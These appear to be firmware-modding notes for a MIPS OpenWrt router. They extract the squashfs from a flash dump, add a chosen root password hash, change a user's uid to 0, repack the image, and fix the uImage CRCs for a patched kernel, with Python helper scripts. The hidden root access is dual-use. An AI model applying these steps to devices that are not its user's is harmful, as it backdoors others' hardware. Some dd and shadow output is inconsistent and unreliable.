327680 0x50000 uImage header, header size: 64 bytes, header CRC: 0xC525C4D1, created: 2016-09-13 04:48:02, image size: 1138908 bytes, Data Address: 0x80000000, Entry Point: 0x80000000, data CRC: 0x2E6A1444, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "MIPS OpenWrt Linux-3.18.36"
327744 0x50040 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 3376620 bytes
1466652 0x16611C Squashfs filesystem, little endian, version 4.0, compression:xz, size: 1919250 bytes, 714 inodes, blocksize: 262144 bytes, created: 2016-09-13 04:47:23
3407872 0x340000 JFFS2 filesystem, little endian
Extract the file system:
>>> sudo unsquashfs _memory.bin.extracted/16611C.squashfs
Parallel unsquashfs: Using 1 processor
653 inodes (657 blocks) to write
[...]
created 468 files
created 61 directories
created 0 symlinks
created 0 devices
created 0 fifos
Modify a file:
# Generate a password hash
>>> mkpasswd -5 root
$1$we1TxRD6$GBiFEgOlEreUU6QF..99H0
# Insert the hash as the root password in ./etc/shadow
>>> cat ./etc/shadow
root:$1$NJi50Ceq$H2TXojQhmmD/lS.I41mSp1:0:0:99999:7:::
root:$1$g1UlaVkd$ZNIs8OXZmUK.QQxY7IoAN/:0:0:99999:7:::
root:$1$we1TxRD6$GBiFEgOlEreUU6QF..99H0:0:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
# Change the user's uid to 0 (root) in ./etc/passwd
>>> cat ./etc/passwd
root:x:0:0:root:/root:/bin/ash
user:x:0:1000:user:/home/user:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
Repackage the file system:
# Find the block size and compression of the partition using binwalk
>>> binwalk memory.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
[...]
1466652 0x16611C Squashfs filesystem, little endian, version 4.0, compression:xz, size: 1919250 bytes, 714 inodes, blocksize: 262144 bytes, created: 2016-09-13 04:47:23
3407872 0x340000 JFFS2 filesystem, little endian
# Rebuild with the same block size (262144) and compression (xz) binwalk reported
>>> mksquashfs squashfs-root myfs -comp xz -always-use-fragments -nopad -noappend -root-owned -b 262144
Parallel mksquashfs: Using 1 processor
Creating 4.0 filesystem on myfs, block size 262144.
[==========================================================================================================================|] 472/472 100%
Exportable Squashfs 4.0 filesystem, xz compressed, data block size 262144
compressed data, compressed metadata, compressed fragments,
compressed xattrs, compressed ids
duplicates are removed
Filesystem size 1892.16 Kbytes (1.85 Mbytes)
33.05% of uncompressed filesystem size (5725.16 Kbytes)
Inode table size 5326 bytes (5.20 Kbytes)
22.27% of uncompressed inode table size (23913 bytes)
Directory table size 6588 bytes (6.43 Kbytes)
46.63% of uncompressed directory table size (14127 bytes)
Number of duplicate files found 3
Number of inodes 713
Number of files 468
Number of fragments 19
Number of symbolic links 184
Number of device nodes 0
Number of fifo nodes 0
Number of socket nodes 0
Number of directories 61
Number of ids (unique uids + gids) 1
Number of uids 1
root (0)
Number of gids 1
root (0)
Repack the flash file:
# Find the squashfs offset in the flash file
>>> binwalk memory.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
94560 0x17160 U-Boot version string, "U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)"
94904 0x172B8 HTML document header
95967 0x176DF HTML document footer
96090 0x1775A HTML document header
96294 0x17826 HTML document footer
96408 0x17898 HTML document header
96940 0x17AAC HTML document footer
97052 0x17B1C HTML document header
97497 0x17CD9 HTML document footer
98693 0x18185 Copyright string: "Copyright 2005-2013 |"
327680 0x50000 uImage header, header size: 64 bytes, header CRC: 0xC525C4D1, created: 2016-09-13 04:48:02, image size: 1138908 bytes, Data Address: 0x80000000, Entry Point: 0x80000000, data CRC: 0x2E6A1444, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "MIPS OpenWrt Linux-3.18.36"
327744 0x50040 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 3376620 bytes
1466652 0x16611C Squashfs filesystem, little endian, version 4.0, compression:xz, size: 1919250 bytes, 714 inodes, blocksize: 262144 bytes, created: 2016-09-13 04:47:23
3407872 0x340000 JFFS2 filesystem, little endian
# skip= offsets into the input file; seek= offsets into the output file
# (conv=notrunc keeps the rest of memory.bin intact)
>>> dd if=_memory.bin.extracted/myfs of=memory.bin bs=1 seek=1466652 conv=notrunc
1926461 bytes (1.9 MB, 1.8 MiB) copied, 160 s, 12.0 kB/s
1937576+0 records in
1937576+0 records out
1937576 bytes (1.9 MB, 1.8 MiB) copied, 160.921 s, 12.0 kB/s
# Check the updated file: the squashfs size and creation date should now be the new ones
>>> binwalk memory.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
94560 0x17160 U-Boot version string, "U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)"
94904 0x172B8 HTML document header
95967 0x176DF HTML document footer
96090 0x1775A HTML document header
96294 0x17826 HTML document footer
96408 0x17898 HTML document header
96940 0x17AAC HTML document footer
97052 0x17B1C HTML document header
97497 0x17CD9 HTML document footer
98693 0x18185 Copyright string: "Copyright 2005-2013 |"
327680 0x50000 uImage header, header size: 64 bytes, header CRC: 0xC525C4D1, created: 2016-09-13 04:48:02, image size: 1138908 bytes, Data Address: 0x80000000, Entry Point: 0x80000000, data CRC: 0x2E6A1444, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "MIPS OpenWrt Linux-3.18.36"
327744 0x50040 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 3376620 bytes
1466652 0x16611C Squashfs filesystem, little endian, version 4.0, compression:xz, size: 1937576 bytes, 713 inodes, blocksize: 262144 bytes, created: 2021-07-06 18:36:47
3407872 0x340000 JFFS2 filesystem, little endian
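As an added example (mine, not from the original notes): a small Python check that reads the binwalk listing, works out how much room each segment has before the next signature starts, and decides whether a rebuilt squashfs (or a recompressed kernel, the MAXSIZE used by the script in the kernel section below) fits before anything is written with dd. BINWALK_OUT is constructed from the listing above with the descriptions shortened; FLASH_SIZE is the 8 MB of the W25Q64BV from the boot log; the function names are my own.

```python
import re

# Constructed from the binwalk listing above, trimmed to the layout-relevant
# entries (descriptions shortened)
BINWALK_OUT = """\
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
94560         0x17160         U-Boot version string, "U-Boot 1.1.3 (Dec 9 2015 - 14:00:36)"
327680        0x50000         uImage header, header size: 64 bytes, image size: 1138908 bytes
327744        0x50040         LZMA compressed data, properties: 0x6D, uncompressed size: 3376620 bytes
1466652       0x16611C        Squashfs filesystem, little endian, version 4.0, compression:xz, size: 1919250 bytes
3407872       0x340000        JFFS2 filesystem, little endian
"""

FLASH_SIZE = 0x800000  # 8 MB SPI flash (W25Q64BV) on this board

ENTRY_RE = re.compile(r"^(\d+)\s+0x([0-9A-Fa-f]+)\s+(.*)$", re.M)


def parse_binwalk(text):
    """[(offset, description)] sorted by offset; both columns must agree."""
    entries = []
    for dec, hexa, desc in ENTRY_RE.findall(text):
        if int(dec) != int(hexa, 16):
            raise ValueError("binwalk columns disagree: %s vs 0x%s" % (dec, hexa))
        entries.append((int(dec), desc.strip()))
    return sorted(entries)


def room_for(entries, offset, image_end=FLASH_SIZE):
    """Bytes from `offset` up to the next signature (or the end of the image)."""
    later = [o for o, _ in entries if o > offset]
    return (min(later) if later else image_end) - offset


def plan_replacement(entries, offset, new_size, image_end=FLASH_SIZE):
    """Verdict for writing `new_size` bytes at `offset` with dd conv=notrunc:
    the seek value, the room available, the slack left, and whether it fits."""
    room = room_for(entries, offset, image_end)
    return {"seek": offset, "room": room, "slack": room - new_size,
            "fits": new_size <= room}


if __name__ == "__main__":
    entries = parse_binwalk(BINWALK_OUT)
    print("rebuilt squashfs:", plan_replacement(entries, 0x16611C, 1937576))
    print("recompressed kernel:", plan_replacement(entries, 0x50040, 1138893))
```

The room is measured to the next binwalk signature, which on this image coincides with the MTD partition boundaries (rootfs_data at 0x340000, rootfs at 0x16611c); on a device where they differ, the MTD boundary from the boot log is the one that matters, since that is where the kernel will stop reading.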
Modifying the Kernel
- Extract the LZMA stream with binwalk
- Load it in IDA and patch the kernel
- Recompress it
- Write it back into the firmware image
Recompress the kernel. The LZMA properties byte 0x6D that binwalk reported decodes to lc=1, lp=2, pb=2 (properties = (pb*5 + lp)*9 + lc), so the same switches are passed to the encoder; the dictionary size of 8388608 bytes is the encoder's default (-d23).
# Use the standalone LZMA SDK utility shown below, which accepts the lc/lp/pb switches
>>> ../lzma
LZMA 4.65 : Igor Pavlov : Public domain : 2009-02-03
Usage: LZMA <e|d> inputFile outputFile [<switches>...]
e: encode file
d: decode file
b: Benchmark
<Switches>
-a{N}: set compression mode - [0, 1], default: 1 (max)
-d{N}: set dictionary size - [12, 30], default: 23 (8MB)
-fb{N}: set number of fast bytes - [5, 273], default: 128
-mc{N}: set number of cycles for match finder
-lc{N}: set number of literal context bits - [0, 8], default: 3
-lp{N}: set number of literal pos bits - [0, 4], default: 0
-pb{N}: set number of pos bits - [0, 4], default: 2
-mf{MF_ID}: set Match Finder: [bt2, bt3, bt4, hc4], default: bt4
-mt{N}: set number of CPU threads
-eos: write End Of Stream marker
-si: read data from stdin
-so: write data to stdout
>>> ../lzma e 50040 -lc1 -lp2 -pb2 -mc100 50040.lzma
LZMA 4.65 : Igor Pavlov : Public domain : 2009-02-03
Script to reduce the file size until it fits (the original size check had a stray `))` and always failed; fixed here):
#!/bin/bash
# Try increasing match-finder cycle counts until the compressed kernel
# fits in the space available before the next segment.
INPUTFILE=$1
OUTPUTFILE="${INPUTFILE}.lzma"
# For this image: MAXSIZE=$((0x16611C - 0x50040))
MAXSIZE=$2
for i in {1..100}; do
    echo "Trying $i"
    ../lzma e "$INPUTFILE" -lc1 -lp2 -pb2 -mc$i "$OUTPUTFILE"
    # Get the compressed file size
    FILESIZE=$(stat -c%s "$OUTPUTFILE")
    echo "Size of $OUTPUTFILE = $FILESIZE bytes."
    echo "Max size is $MAXSIZE bytes."
    if [ "$FILESIZE" -gt "$MAXSIZE" ]; then
        echo "nope"
    else
        echo "fine"
        break
    fi
done
Modifying the uImage Header:
# Copy the old 64-byte header out of the original image
>>> dd if=../origional_memory.bin of=50000 bs=1 skip=$((0x50000)) count=$((0x40))
64+0 records in
64+0 records out
64 bytes copied, 0.0210238 s, 3.0 kB/s
# Calculate the new data CRC over the recompressed kernel
>>> crc32 50040.lzma
7fde2b33
# Zero the header CRC (offset 4) and data CRC (offset 24) fields
>>> dd if=/dev/zero of=50000_nocrc bs=1 seek=4 count=4 conv=notrunc
>>> dd if=/dev/zero of=50000_nocrc bs=1 seek=24 count=4 conv=notrunc
>>> xxd 50000_nocrc
00000000: 2705 1956 0000 0000 57d7 8502 0011 60dc '..V....W.....`.
00000010: 8000 0000 8000 0000 0000 0000 0505 0203 ................
00000020: 4d49 5053 204f 7065 6e57 7274 204c 696e MIPS OpenWrt Lin
00000030: 7578 2d33 2e31 382e 3336 0000 0000 0000 ux-3.18.36......
# Insert the data CRC at offset 24:
>>> xxd 50000_nocrc
00000000: 2705 1956 0000 0000 57d7 8502 0011 60dc '..V....W.....`.
00000010: 8000 0000 8000 0000 7fde 2b33 0505 0203 ..........+3....
00000020: 4d49 5053 204f 7065 6e57 7274 204c 696e MIPS OpenWrt Lin
00000030: 7578 2d33 2e31 382e 3336 0000 0000 0000 ux-3.18.36......
# Update the image size field (offset 12) to the length of the new lzma: 1138893 = 0x1160cd
>>> ls -al 50040.lzma
-rw-r--r-- 1 502 dialout 1138893 Jul 8 15:04 50040.lzma
>>> xxd 50000_newcrc
00000000: 2705 1956 0000 0000 57d7 8502 0011 60cd '..V....W.....`.
00000010: 8000 0000 8000 0000 7fde 2b33 0505 0203 ..........+3....
00000020: 4d49 5053 204f 7065 6e57 7274 204c 696e MIPS OpenWrt Lin
00000030: 7578 2d33 2e31 382e 3336 0000 0000 0000 ux-3.18.36......
# Calculate the header CRC over the header while its own CRC field is still zero
>>> crc32 50000_newcrc
7a3ceeb3
# Insert the header CRC at offset 4:
>>> xxd 50000_newcrc
00000000: 2705 1956 7a3c eeb3 57d7 8502 0011 60cd '..Vz<..W.....`.
00000010: 8000 0000 8000 0000 7fde 2b33 0505 0203 ..........+3....
00000020: 4d49 5053 204f 7065 6e57 7274 204c 696e MIPS OpenWrt Lin
00000030: 7578 2d33 2e31 382e 3336 0000 0000 0000 ux-3.18.36......
Add the uImage header to the file:
#Check File for all of the
>>> binwalk _memory.bin.extracted/50000_newcrc
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 uImage header, header size: 64 bytes, header CRC: 0x7A3CEEB3, created: 2016-09-13 04:48:02, image size: 1138893 bytes, Data Address: 0x80000000, Entry Point: 0x80000000, data CRC: 0x7FDE2B33, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "MIPS OpenWrt Linux-3.18.36"
# Merge the new kernel with the updated header
>>> cat 50000_newcrc 50040.lzma > mod_uimage.bin
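As an added example (mine, not from the original notes): the header surgery above done in Python with struct and zlib, so the offsets, the zeroed-field rule for the header CRC and the result can be checked in one place. parse_header unpacks the 64-byte big-endian uImage header, rewrap performs the same steps as the dd/crc32 sequence (patch size and data CRC, then recompute the header CRC with its own field zeroed, which is U-Boot's definition), and verify applies the checks bootm makes (magic, header CRC, data CRC) plus the size. ORIG_HEADER is constructed from the xxd listings above with the two CRC fields as binwalk reported them; the function names are my own.

```python
import datetime
import struct
import zlib

UIMAGE_FMT = ">IIIIIIIBBBB32s"   # 64-byte big-endian uImage header (U-Boot image.h)
UIMAGE_MAGIC = 0x27051956

# Constructed from the xxd listings above: the stock kernel's header with both
# CRC fields as binwalk reported them (header CRC 0xC525C4D1, data CRC 0x2E6A1444)
ORIG_HEADER = bytes.fromhex(
    "27051956 c525c4d1 57d78502 001160dc"
    "80000000 80000000 2e6a1444 05050203"
    "4d495053 204f7065 6e577274 204c696e"
    "75782d33 2e31382e 33360000 00000000"
)


def parse_header(h):
    """Unpack the fixed fields; offsets 4, 12 and 24 are the ones patched above."""
    (magic, hcrc, ts, size, load, ep, dcrc,
     os_, arch, itype, comp, name) = struct.unpack(UIMAGE_FMT, h[:64])
    return {"magic": magic, "hcrc": hcrc, "size": size, "load": load, "ep": ep,
            "dcrc": dcrc, "os": os_, "arch": arch, "type": itype, "comp": comp,
            "name": name.rstrip(b"\0").decode(),
            "time_utc": datetime.datetime.fromtimestamp(
                ts, datetime.timezone.utc).isoformat()}


def header_crc(h):
    """CRC32 over the 64-byte header with its own CRC field zeroed (U-Boot's rule)."""
    return zlib.crc32(h[:4] + b"\0\0\0\0" + h[8:64]) & 0xFFFFFFFF


def verify(h, payload):
    """The checks bootm applies (magic, header CRC, data CRC) plus the size field."""
    f = parse_header(h)
    return {"magic_ok": f["magic"] == UIMAGE_MAGIC,
            "hcrc_ok": f["hcrc"] == header_crc(h),
            "size_ok": f["size"] == len(payload),
            "dcrc_ok": f["dcrc"] == (zlib.crc32(payload) & 0xFFFFFFFF)}


def rewrap(old_header, payload):
    """The dd/crc32 sequence above in one step: keep the old header, patch the
    size and data CRC for the new payload, then recompute the header CRC."""
    h = bytearray(old_header[:64])
    struct.pack_into(">I", h, 12, len(payload))
    struct.pack_into(">I", h, 24, zlib.crc32(payload) & 0xFFFFFFFF)
    struct.pack_into(">I", h, 4, header_crc(bytes(h)))
    return bytes(h)


if __name__ == "__main__":
    f = parse_header(ORIG_HEADER)
    print("%s, %d bytes, built %s" % (f["name"], f["size"], f["time_utc"]))
    print("stored header CRC consistent:", f["hcrc"] == header_crc(ORIG_HEADER))
```

Running the module prints whether the stored header CRC of the stock image is consistent with its other fields; the same verify call on a rewrapped header with the real 50040.lzma as payload is the check to make before the image goes anywhere near the flash.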
Merge the image into the firmware:
# Zero the old kernel region (header plus data) before writing
>>> dd if=/dev/zero of=memory.bin bs=1 seek=$((0x50000)) count=$((0x16611C - 0x50000)) conv=notrunc
1133173 bytes (1.1 MB, 1.1 MiB) copied, 99 s, 11.4 kB/s
1138972+0 records in
1138972+0 records out
1138972 bytes (1.1 MB, 1.1 MiB) copied, 99.501 s, 11.4 kB/s
# Write the new kernel at the uImage header offset
>>> dd if=_memory.bin.extracted/mod_uimage.bin of=memory.bin bs=1 seek=$((0x50000)) conv=notrunc